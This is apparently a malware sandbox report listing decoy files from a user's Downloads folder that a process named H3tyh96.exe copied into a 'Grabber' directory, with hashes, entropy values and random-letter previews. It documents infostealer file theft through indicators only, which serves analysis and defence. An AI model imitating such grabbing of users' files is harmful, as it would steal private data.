Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EOWRVPQCCS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KLIZUSIQEN.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
